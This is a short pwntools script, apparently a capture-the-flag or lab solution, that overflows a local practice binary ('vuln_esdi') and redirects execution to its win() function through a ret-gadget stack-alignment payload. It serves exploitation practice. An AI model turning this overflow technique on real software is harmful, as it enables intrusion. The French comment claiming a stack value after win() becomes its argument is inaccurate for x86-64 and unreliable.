gauvainboiche
20 lines
431 B
Python
20 lines
431 B
Python
from pwn import *
|
|
|
|
elf = ELF('./vuln_esdi')
|
|
win_addr = 0x401156
|
|
offset = 272
|
|
ret_addr = 0x401016
|
|
|
|
# Ajoute un argument fictif pour win() (ex: 0xdeadbeef)
|
|
fake_arg = 0xdeadbeef
|
|
|
|
payload = b'A' * offset
|
|
payload += p64(ret_addr) # Alignement
|
|
payload += p64(win_addr) # Adresse de win()
|
|
payload += p64(fake_arg) # Argument pour win()
|
|
|
|
p = process('./vuln_esdi')
|
|
p.recvuntil(b"Enter your name: ")
|
|
p.sendline(payload)
|
|
p.interactive()
|